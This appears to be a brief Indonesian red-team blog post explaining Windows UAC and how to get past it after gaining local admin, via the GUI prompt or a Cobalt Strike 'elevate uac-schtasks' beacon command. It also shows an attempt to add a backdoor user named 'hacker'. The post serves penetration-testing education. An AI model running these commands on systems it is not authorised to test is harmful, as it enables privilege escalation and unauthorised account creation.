Post

[Misconfig] UAC Bypass

Posted
By Nairpaa 1 min read

User Account Control (UAC) adalah sebuah teknologi yang ada pada Windows yang memaksa aplikasi untuk meminta persetujuan ketika meminta token akses administratif.

Mungkin kita telah mendapatkan user dengan hak akses administrator lokal pada suatu komputer, tetapi ketika menjalankan perintah untuk menambahkan user pada Command Prompt kita mendapatkan penolakan akses.

Hal ini terjadi karena cmd.exe berjalan dalam medium integrity.

1
2
3
4
5
6
7
8

C:\> net user hacker Passw0rd! /add
System error 5 has occurred.

Access is denied.

C:\> whoami /groups

Mandatory Label\Medium Mandatory Level

0x1 - Bypassing UAC

A. Using GUI

Jalankan program dengan “Run as administrator”, yang akan menyebabkan prompt UAC muncul.

UAC Prompt UAC Prompt

Hanya setelah mengklik Yes, Command Prompt akan memiliki hak istimewa yang bisa membuat perubahan konfigurasi sistem, karena sekarang akan berjalan dalam “high integrity”.

1
2
3

C:> whoami /groups

Mandatory Label\High Mandatory Level

B. Using Cobalt Strike

1

beacon> elevate uac-schtasks tcp-local

0x2 - References

  • https://github.com/cobalt-strike/ElevateKit
  • https://book.hacktricks.xyz/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control
  • https://github.com/k4sth4/UAC-bypass
Privilege Escalation, Windows Privilege Escalation
red team privilege escalation what is windows hacking windows privilege escalation misconfig
This post is licensed under CC BY 4.0 by the author.